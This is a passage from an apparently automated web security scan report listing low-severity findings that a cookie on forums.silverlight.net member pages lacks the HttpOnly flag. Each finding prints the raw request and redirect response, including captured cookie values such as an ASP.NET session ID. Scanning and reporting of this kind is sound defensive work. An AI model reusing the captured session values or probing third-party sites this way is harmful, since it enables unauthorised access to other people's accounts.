Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbradsevertson.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:34 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbradseverts
...[SNIP]...

17.233. http://forums.silverlight.net/members/brucemcmillan.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/brucemcmillan.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/brucemcmillan.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbrucemcmillan.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:22 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbrucemcmill
...[SNIP]...

17.234. http://forums.silverlight.net/members/clintong.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/clintong.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/clintong.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fclintong.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:36 GMT; expires=Sun, 29-Jan-2012 23:16:36 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:36 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fclintong.as
...[SNIP]...

17.235. http://forums.silverlight.net/members/dhook.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/dhook.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/dhook.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 233
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fdhook.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:21 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fdhook.aspx"
...[SNIP]...

17.236. http://forums.silverlight.net/members/emil.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/emil.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/emil.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 232
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2femil.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2femil.aspx">
...[SNIP]...

17.237. http://forums.silverlight.net/members/gary-frank.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/gary-frank.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/gary-frank.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fgary-frank.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:20 GMT; expires=Sun, 29-Jan-2012 23:41:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fgary-frank.
...[SNIP]...

17.238. http://forums.silverlight.net/members/houmie.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/houmie.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/houmie.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fhoumie.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:21 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fhoumie.aspx
...[SNIP]...

17.239. http://forums.silverlight.net/members/ilektrik.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/ilektrik.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/ilektrik.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2filektrik.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:28 GMT; expires=Sun, 29-Jan-2012 23:16:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:28 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2filektrik.as
...[SNIP]...

17.240. http://forums.silverlight.net/members/jamlew.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/jamlew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jamlew.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjamlew.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:08 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjamlew.aspx
...[SNIP]...

17.241. http://forums.silverlight.net/members/jerry-weng-_2D00_-msft.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/jerry-weng-_2D00_-msft.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jerry-weng-_2D00_-msft.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 250
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjerry-weng-_2D00_-msft.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjerry-weng-
...[SNIP]...

17.242. http://forums.silverlight.net/members/jesseliberty.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/jesseliberty.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jesseliberty.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 240
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjesseliberty.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:37 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjesselibert
...[SNIP]...

17.243. http://forums.silverlight.net/members/jimpoteet.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/jimpoteet.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jimpoteet.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjimpoteet.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjimpoteet.a
...[SNIP]...

17.244. http://forums.silverlight.net/members/jperl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/jperl.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jperl.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 233
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjperl.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:15 GMT; expires=Sun, 29-Jan-2012 23:16:15 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:15 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjperl.aspx"
...[SNIP]...

17.245. http://forums.silverlight.net/members/khalzoro.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/khalzoro.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/khalzoro.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkhalzoro.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:04 GMT; expires=Sun, 29-Jan-2012 23:16:04 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:05 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkhalzoro.as
...[SNIP]...

17.246. http://forums.silverlight.net/members/kylemc.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/kylemc.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/kylemc.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkylemc.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkylemc.aspx
...[SNIP]...

17.247. http://forums.silverlight.net/members/lein4d.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/lein4d.aspx

Issue detail

